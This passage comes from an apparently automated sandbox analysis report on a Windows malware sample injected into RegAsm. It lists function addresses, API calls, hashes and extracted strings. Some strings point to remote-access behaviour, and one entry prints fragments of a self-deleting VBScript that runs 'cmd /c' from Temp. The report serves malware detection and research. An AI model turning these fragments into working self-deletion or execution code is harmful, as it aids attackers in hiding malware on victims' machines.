                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                  Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045137F
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513A1
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513B6
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513C1
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513E3
                                                                                                                                                                                                  • _free.LIBCMT ref: 004513F6
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451404
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045140F
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451447
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045144E
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045146B
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451483
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                                                                  Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                                                                                                                                  • API String ID: 489098229-1431523004
                                                                                                                                                                                                  • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                                                                                  Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                                  • API String ID: 1913171305-3159800282
                                                                                                                                                                                                  • Opcode ID: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                                                                                                                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                                                                                                  Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3658366068-0
                                                                                                                                                                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                                                                                                                                  Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                                                                                  • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                                                                                  Function 00453E03 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                                                                                  • __freea.LIBCMT ref: 00454083
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0045408F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 201697637-2084328917
                                                                                                                                                                                                  • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                                                                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                                                                                  Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                  • String ID: \&G$\&G$`&G
                                                                                                                                                                                                  • API String ID: 269201875-253610517
                                                                                                                                                                                                  • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                                                  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                                                                                  Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 65535$udp
                                                                                                                                                                                                  • API String ID: 0-1267037602
                                                                                                                                                                                                  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                                                  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                                                                                  Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A9C3
                                                                                                                                                                                                  • _free.LIBCMT ref: 0043A9CA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2441525078-0
                                                                                                                                                                                                  • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                                                                                  Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                                                  • GetMessageA.USER32 ref: 0040556F
                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                                                                                                  • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                                                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                                                                                  Function 00455F84 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt$t'`/
                                                                                                                                                                                                  • API String ID: 3527080286-1398745098
                                                                                                                                                                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                                                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                                                                                                                  Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                                                  • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                                                                                  • API String ID: 1704390241-2575729100
                                                                                                                                                                                                  • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
